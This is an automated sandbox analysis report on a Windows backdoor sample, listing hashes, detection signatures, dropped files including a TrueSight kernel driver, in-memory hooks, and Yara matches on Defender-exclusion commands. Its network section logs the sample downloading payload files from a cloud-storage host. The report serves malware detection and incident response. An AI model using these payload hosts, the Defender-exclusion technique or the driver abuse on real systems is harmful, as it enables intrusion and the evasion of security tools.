Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2o63254452-763487230.06.exe

Overview

General Information

Sample name:2o63254452-763487230.06.exe
Analysis ID:1586401
MD5:0c3951cfe848ead37f11600ee5195006
SHA1:1f8a4240b5775c7d7c91c0bb48cf2a52df246f5c
SHA256:b0f951ad23e146280e4cdda33f3eb97c99baede4e8429c4366d84971bf8aaeaa
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Yara signature match

Classification

  • System is w10x64
  • 2o63254452-763487230.06.exe (PID: 5956 cmdline: "C:\Users\user\Desktop\2o63254452-763487230.06.exe" MD5: 0C3951CFE848EAD37F11600EE5195006)
  • hy58DJ.exe (PID: 6648 cmdline: C:\Users\user\Documents\hy58DJ.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • hy58DJ.exe (PID: 5848 cmdline: C:\Users\user\Documents\hy58DJ.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
5.2.hy58DJ.exe.2850000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
6.2.hy58DJ.exe.2780000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 2o63254452-763487230.06.exeVirustotal: Detection: 11%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:50391 version: TLS 1.2
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: hy58DJ.exe, 00000005.00000000.2673572049.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000006.00000000.2903082534.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe.0.dr
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A45A1B8 FindFirstFileExW,5_2_00007FFE1A45A1B8
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4CA1B8 FindFirstFileExW,6_2_00007FFE1A4CA1B8
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9
Source: global trafficTCP traffic: 192.168.2.4:50246 -> 162.159.36.2:53
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: a8mw1y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: a8mw1y.oss-cn-beijing.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: hy58DJ.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: hy58DJ.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: hy58DJ.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: hy58DJ.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: hy58DJ.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: hy58DJ.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: hy58DJ.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: hy58DJ.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: hy58DJ.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: hy58DJ.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: hy58DJ.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: hy58DJ.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: hy58DJ.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: hy58DJ.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: hy58DJ.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: hy58DJ.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hy58DJ.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: hy58DJ.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hy58DJ.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hy58DJ.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: hy58DJ.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: hy58DJ.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: hy58DJ.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: hy58DJ.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: hy58DJ.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: hy58DJ.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50403
Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50435
Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50506
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50419
Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50493
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50445
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50391
Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 443
Source: unknownHTTPS traffic detected: 59.110.190.44:443 -> 192.168.2.4:50391 version: TLS 1.2

System Summary

barindex
Source: 5.2.hy58DJ.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 6.2.hy58DJ.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140006C95 NtAllocateVirtualMemory,6_2_0000000140006C95
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400093005_2_0000000140009300
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A4602485_2_00007FFE1A460248
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A45A1B85_2_00007FFE1A45A1B8
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_000000014000C3F06_2_000000014000C3F0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_000000014000CC006_2_000000014000CC00
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140001A306_2_0000000140001A30
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_000000014000C2A06_2_000000014000C2A0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400022C06_2_00000001400022C0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400110F06_2_00000001400110F0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140010CF06_2_0000000140010CF0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400093006_2_0000000140009300
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_000000014000BB706_2_000000014000BB70
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140003F806_2_0000000140003F80
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400103D06_2_00000001400103D0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4D02486_2_00007FFE1A4D0248
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4CA1B86_2_00007FFE1A4CA1B8
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\hy58DJ.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: C:\Users\user\Documents\hy58DJ.exeCode function: String function: 0000000140006A65 appears 56 times
Source: C:\Users\user\Documents\hy58DJ.exeCode function: String function: 0000000140004F10 appears 46 times
Source: 5.2.hy58DJ.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.hy58DJ.exe.2780000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal80.evad.winEXE@3/12@1/1
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
Source: C:\Users\user\Documents\hy58DJ.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
Source: C:\Users\user\Documents\hy58DJ.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,6_2_0000000140001430
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\hy58DJ.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: 2o63254452-763487230.06.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2o63254452-763487230.06.exeVirustotal: Detection: 11%
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile read: C:\Users\user\Desktop\2o63254452-763487230.06.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2o63254452-763487230.06.exe "C:\Users\user\Desktop\2o63254452-763487230.06.exe"
Source: unknownProcess created: C:\Users\user\Documents\hy58DJ.exe C:\Users\user\Documents\hy58DJ.exe
Source: unknownProcess created: C:\Users\user\Documents\hy58DJ.exe C:\Users\user\Documents\hy58DJ.exe
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: 2o63254452-763487230.06.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2o63254452-763487230.06.exeStatic file information: File size 30965248 > 1048576
Source: 2o63254452-763487230.06.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58400
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 2o63254452-763487230.06.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: hy58DJ.exe, 00000005.00000000.2673572049.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000006.00000000.2903082534.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe, 00000006.00000002.2916048599.0000000140014000.00000002.00000001.01000000.00000008.sdmp, hy58DJ.exe.0.dr
Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2o63254452-763487230.06.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\hy58DJ.exeJump to dropped file
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Users\user\Documents\hy58DJ.exeJump to dropped file
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\hy58DJ.exeMemory written: PID: 6648 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeMemory written: PID: 6648 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeMemory written: PID: 5848 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeMemory written: PID: 5848 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior

Malware Analysis System Evasion

barindex
